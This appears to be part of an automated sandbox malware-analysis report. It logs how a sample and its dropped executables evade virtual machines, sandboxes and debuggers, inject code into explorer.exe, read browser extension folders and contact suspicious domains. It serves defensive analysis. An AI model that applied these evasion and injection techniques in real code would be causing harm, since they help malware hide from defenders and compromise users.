                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        barindex
                        Tries to evade analysis by execution special instruction which cause usermode exceptionShow sources
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 00000000013DFC16 instructions 0F0B caused by: Known instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 0000000003301BEA instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 0000000003302759 instructions 0F0B caused by: Known instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 00000000033109BD instructions 0F0B caused by: Known instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 000000000330EE36 instructions 0F0B caused by: Known instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 00000000033184F6 instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 0000000003318B2D instructions 0F0B caused by: Known instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 000000000330543F instructions 0F3F070B33C033D23945080F95C264 caused by: Unknown instruction #UD exception
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSpecial instruction interceptor: First address: 00000000033054AC instructions 0FC7C8 caused by: Known instruction #UD exception
                        Query firmware table information (likely to detect VMs)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeSystem information queried: FirmwareTableInformation
                        Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                        Source: ddigjgj, 00000009.00000002.435857331.000000000075B000.00000004.00000020.sdmpBinary or memory string: ASWHOOKL
                        Checks if the current machine is a virtual machine (disk enumeration)Show sources
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Roaming\ddigjgjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Roaming\ddigjgjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Roaming\ddigjgjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Roaming\ddigjgjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Roaming\ddigjgjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Roaming\ddigjgjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Contains functionality to detect sleep reduction / modificationsShow sources
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004065D0
                        Source: C:\Windows\explorer.exe TID: 6548Thread sleep count: 585 > 30
                        Source: C:\Windows\explorer.exe TID: 6536Thread sleep count: 172 > 30
                        Source: C:\Windows\explorer.exe TID: 6540Thread sleep count: 241 > 30
                        Source: C:\Windows\explorer.exe TID: 6568Thread sleep count: 352 > 30
                        Source: C:\Windows\explorer.exe TID: 6576Thread sleep count: 131 > 30
                        Source: C:\Windows\explorer.exe TID: 4768Thread sleep count: 81 > 30
                        Source: C:\Users\user\AppData\Local\Temp\C169.exe TID: 2236Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe TID: 4000Thread sleep count: 115 > 30
                        Source: C:\Users\user\AppData\Local\Temp\D375.exe TID: 6020Thread sleep time: -36000s >= -30000s
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 1768Thread sleep count: 31 > 30
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 585
                        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 352
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004065D0
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013F2823 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeFile opened / queried: VBoxGuest
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeFile opened: PhysicalDrive0
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                        Source: A70A.exe, 0000000B.00000002.596594969.00000000018B1000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwarePCT2WF3FWin32_VideoControllerFR1S6ED1VideoController120060621000000.000000-00082035712display.infMSBDA1ZWMS9RNPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors8G6D26ZC
                        Source: C169.exe, 00000017.00000002.578609162.0000000001017000.00000004.00000001.sdmpBinary or memory string: VMware
                        Source: C169.exe, 00000017.00000002.605485647.00000000068A5000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                        Source: EE61.exe, 0000001F.00000002.578653950.000000000150D000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7A
                        Source: explorer.exe, 00000004.00000000.340612665.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: explorer.exe, 00000004.00000000.359571061.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                        Source: explorer.exe, 00000004.00000000.340612665.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                        Source: D375.exe, 0000001A.00000002.601649001.0000000001571000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: WerFault.exe, 0000001B.00000002.566769297.0000000004810000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                        Source: C169.exe, 00000017.00000002.578609162.0000000001017000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwarePCT2WF3FWin32_VideoControllerFR1S6ED1VideoController120060621000000.000000-00082035712display.infMSBDA1ZWMS9RNikjI
                        Source: A70A.exeBinary or memory string: \.\VBoxGuest
                        Source: explorer.exe, 00000004.00000000.354712312.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                        Source: AA02.exe, 00000016.00000002.528893220.00000000008FB000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.566899937.000000000484B000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.558307851.000000000484B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                        Source: A70A.exe, 0000000B.00000002.598873693.0000000003300000.00000040.00000001.sdmpBinary or memory string: !"K\\.\VBoxGuest
                        Source: explorer.exe, 00000004.00000000.323430367.000000000EF34000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}uuuuvvvvvvuuuu
                        Source: AA02.exe, 00000016.00000002.528893220.00000000008FB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW,
                        Source: A70A.exeBinary or memory string: \\.\VBoxGuest
                        Source: C169.exe, 00000017.00000002.605280039.0000000006871000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: explorer.exe, 00000004.00000000.340612665.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                        Source: AA02.exe, 00000016.00000002.528450541.00000000008D1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWx=
                        Source: D375.exe, 0000001A.00000002.601649001.0000000001571000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00401240 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00401050 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004096C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00408360 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00405990 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CopyFileA,DeleteFileA,_strtok_s,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00409260 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004094F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeSystem information queried: ModuleInformation

                        Anti Debugging:

                        barindex
                        Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeOpen window title or class name: windbgframeclass
                        Hides threads from debuggersShow sources
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeThread information set: HideFromDebugger
                        Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeSystem information queried: CodeIntegrityInformation
                        Source: C:\Users\user\AppData\Roaming\ddigjgjSystem information queried: CodeIntegrityInformation
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeSystem information queried: CodeIntegrityInformation
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_004087FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_02BC0083 push dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_04790042 push dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00401000 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0040BDE0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00891F83 push dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\ddigjgjProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess queried: DebugFlags
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeFile opened: NTICE
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeFile opened: SICE
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_00406436 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0040B240 GetProcessHeap,RtlAllocateHeap,
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013F2823 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSystem information queried: KernelDebuggerInformation
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_004027ED LdrLoadDll,
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeMemory allocated: page read and write | page guard
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_00406436 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_0040529C SetUnhandledExceptionFilter,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_00402FAF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00413711 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0041651C SetUnhandledExceptionFilter,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00413531 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        System process connects to network (likely due to code injection or exploit)Show sources
                        Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-7000.com
                        Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                        Source: C:\Windows\explorer.exeDomain query: host-file-host-3.com
                        Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                        Benign windows process drops PE filesShow sources
                        Source: C:\Windows\explorer.exeFile created: ddigjgj.4.drJump to dropped file
                        Maps a DLL or memory area into another processShow sources
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Source: C:\Users\user\AppData\Roaming\ddigjgjSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\AppData\Roaming\ddigjgjSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Injects a PE file into a foreign processesShow sources
                        Source: C:\Users\user\AppData\Roaming\ddigjgjMemory written: C:\Users\user\AppData\Roaming\ddigjgj base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeMemory written: C:\Users\user\AppData\Local\Temp\C169.exe base: 400000 value starts with: 4D5A
